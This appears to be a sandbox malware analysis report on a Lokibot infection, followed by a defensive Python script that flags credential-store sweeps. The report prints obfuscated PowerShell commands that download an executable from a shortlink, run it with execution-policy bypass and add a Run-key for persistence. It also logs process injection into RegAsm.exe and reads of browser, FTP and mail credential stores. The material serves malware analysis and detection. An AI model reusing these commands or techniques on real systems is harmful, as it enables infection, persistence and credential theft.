                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\ntrwe.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\12.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\12.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\ntrwe.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\ntrwe.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\ntrwe.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\ntrwe.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2708 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2828 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2688 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\12.exe TID: 1484 | Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\12.exe TID: 1840 | Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\12.exe TID: 1840 | Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\12.exe TID: 1836 | Thread sleep count: 187 > 30
                Source: C:\Users\user\AppData\Local\Temp\12.exe TID: 2964 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\ntrwe.exe TID: 1476 | Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Users\user\ntrwe.exe TID: 1476 | Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\ntrwe.exe TID: 1900 | Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\ntrwe.exe TID: 1544 | Thread sleep count: 156 > 30
                Source: C:\Users\user\ntrwe.exe TID: 1192 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 2076 | Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 2076 | Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\ntrwe.exe TID: 2492 | Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Users\user\ntrwe.exe TID: 2492 | Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\ntrwe.exe TID: 2500 | Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\ntrwe.exe TID: 1776 | Thread sleep count: 185 > 30
                Source: C:\Users\user\ntrwe.exe TID: 2784 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Last function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 17_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                Source: 12.exe, 0000000B.00000003.2176518302.00000000082B9000.00000004.00000001.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 17_2_0040317B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 17_2_00402B7C GetProcessHeap,RtlAllocateHeap,
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\12.exe | Process token adjusted: Debug
                Source: C:\Users\user\ntrwe.exe | Process token adjusted: Debug
                Source: C:\Users\user\ntrwe.exe | Process token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Process token adjusted: Debug
                Source: C:\Users\user\ntrwe.exe | Process token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\12.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion:

                Allocates memory in foreign processes
                Source: C:\Users\user\ntrwe.exe | Memory allocated: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\ntrwe.exe | Memory allocated: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 protect: page execute and read and write
                Bypasses PowerShell execution policy
                Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Injects a PE file into foreign processes
                Source: C:\Users\user\ntrwe.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\ntrwe.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 value starts with: 4D5A
                Writes to foreign memory regions
                Source: C:\Users\user\ntrwe.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000
                Source: C:\Users\user\ntrwe.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 401000
                Source: C:\Users\user\ntrwe.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 415000
                Source: C:\Users\user\ntrwe.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 41A000
                Source: C:\Users\user\ntrwe.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 4A0000
                Source: C:\Users\user\ntrwe.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 7EFDE008
                Source: C:\Users\user\ntrwe.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000
                Source: C:\Users\user\ntrwe.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 401000
                Source: C:\Users\user\ntrwe.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 415000
                Source: C:\Users\user\ntrwe.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 41A000
                Source: C:\Users\user\ntrwe.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 4A0000
                Source: C:\Users\user\ntrwe.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 7EFDE008
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\12.exe C:\Users\user\AppData\Local\Temp\12.exe
                Source: C:\Users\user\AppData\Local\Temp\12.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
                Source: C:\Users\user\AppData\Local\Temp\12.exe | Process created: C:\Users\user\ntrwe.exe 'C:\Users\user\ntrwe.exe'
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
                Source: C:\Users\user\ntrwe.exe | Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
                Source: C:\Users\user\ntrwe.exe | Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\12.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\12.exe VolumeInformation
                Source: C:\Users\user\ntrwe.exe | Queries volume information: C:\Users\user\ntrwe.exe VolumeInformation
                Source: C:\Users\user\ntrwe.exe | Queries volume information: C:\Users\user\ntrwe.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                Source: C:\Users\user\ntrwe.exe | Queries volume information: C:\Users\user\ntrwe.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 17_2_00406069 GetUserNameW,
                Source: C:\Users\user\AppData\Local\Temp\12.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                Yara detected Lokibot
                Source: Yara match | File source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.2212693514.0000000002790000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.2193389507.0000000002792000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: 12.exe PID: 2800, type: MEMORY
                Source: Yara match | File source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                Tries to steal Mail credentials (via file access)
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                Tries to steal Mail credentials (via file registry)Show sources
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: PopPassword
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: SmtpPassword
                Source: Yara matchFile source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2212693514.0000000002790000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2193389507.0000000002792000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2192, type: MEMORY
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
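The signatures above all describe one behaviour: a single process (here the hollowed RegAsm.exe) reading credential stores of several unrelated applications, which no legitimate program does. The following script is an added example for this write-up, not Joe Sandbox code and not part of the report; it turns that observation into a small hunting rule over file/registry access events. The event lines are constructed to mirror the report's "File opened" / "Key opened" entries, the event format and the owner allowlist are assumptions of the example, and the store paths are the ones the report lists.

```python
"""Flag processes that read credential stores across several application
families, the access pattern the report's Lokibot signatures describe.

Added example for this write-up; it is not Joe Sandbox code and not part of
the report. The event lines are constructed to mirror the report's
"File opened" / "Key opened" entries and are not real telemetry.
"""
import re
from collections import defaultdict

# Credential stores named in the report, grouped by application family.
# Patterns are regexes over Windows paths / registry keys (case-insensitive).
CRED_STORES = {
    "browser": [
        r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\(key3|cert8|secmod)\.db$",
        r"\\Mozilla\\Firefox\\profiles\.ini$",
        r"\\Google\\Chrome\\User Data\\[^\\]+\\Login Data$",
    ],
    "ftp": [
        r"^HKEY_CURRENT_USER\\Software\\Far2?\\Plugins\\FTP\\Hosts$",
        r"^HKEY_CURRENT_USER\\Software\\NCH Software\\ClassicFTP\\FTPAccounts$",
        r"^HKEY_CURRENT_USER\\Software\\FlashPeak\\BlazeFtp\\Settings$",
    ],
    "mail": [
        r"^HKEY_CURRENT_USER\\Software\\IncrediMail\\Identities$",
        r"\\Windows Messaging Subsystem\\Profiles\\Outlook$",
    ],
    "sftp": [
        r"^HKEY_CURRENT_USER\\Software\\Martin Prikryl$",  # WinSCP vendor key
    ],
}

# Images that legitimately own a store (assumed list); their own reads are ignored.
EXPECTED_OWNERS = {
    "browser": {"firefox.exe", "chrome.exe"},
    "ftp": {"far.exe", "classicftp.exe", "blazeftp.exe"},
    "mail": {"outlook.exe", "incmail.exe"},
    "sftp": {"winscp.exe"},
}

# Constructed event format: "<pid> | <image path> | <File opened|Key opened> | <path>"
EVENT_RE = re.compile(
    r"^(?P<pid>\d+) \| (?P<image>[^|]+?) \| (?P<op>File opened|Key opened) \| (?P<path>.+)$"
)


def classify(path: str):
    """Return the credential-store family a path belongs to, or None."""
    for family, patterns in CRED_STORES.items():
        if any(re.search(p, path, re.IGNORECASE) for p in patterns):
            return family
    return None


def score_events(lines, min_families=2):
    """Group credential-store reads per (pid, image) and report every process
    that touches at least `min_families` families it does not own.

    A single application reading its own store is normal; one process
    sweeping browser, FTP, mail and SFTP stores is the stealer pattern.
    """
    touched = defaultdict(set)
    for line in lines:
        m = EVENT_RE.match(line)
        if not m:
            continue  # skip lines that are not in the constructed format
        family = classify(m["path"])
        if family is None:
            continue
        basename = m["image"].rsplit("\\", 1)[-1].lower()
        if basename in EXPECTED_OWNERS[family]:
            continue
        touched[(int(m["pid"]), m["image"])].add(family)
    return {
        key: sorted(families)
        for key, families in touched.items()
        if len(families) >= min_families
    }


# Constructed sample: the report's RegAsm.exe accesses plus two benign reads.
SAMPLE_EVENTS = [
    r"2192 | C:\Users\user\AppData\Local\Temp\RegAsm.exe | Key opened | HKEY_CURRENT_USER\Software\Martin Prikryl",
    r"2192 | C:\Users\user\AppData\Local\Temp\RegAsm.exe | File opened | C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db",
    r"2192 | C:\Users\user\AppData\Local\Temp\RegAsm.exe | File opened | C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"2192 | C:\Users\user\AppData\Local\Temp\RegAsm.exe | Key opened | HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts",
    r"2192 | C:\Users\user\AppData\Local\Temp\RegAsm.exe | Key opened | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook",
    r"4100 | C:\Program Files\Mozilla Firefox\firefox.exe | File opened | C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db",
    r"4300 | C:\Windows\explorer.exe | File opened | C:\Users\user\Documents\notes.txt",
]

if __name__ == "__main__":
    for (pid, image), families in score_events(SAMPLE_EVENTS).items():
        print(f"ALERT pid={pid} image={image} families={families}")
```

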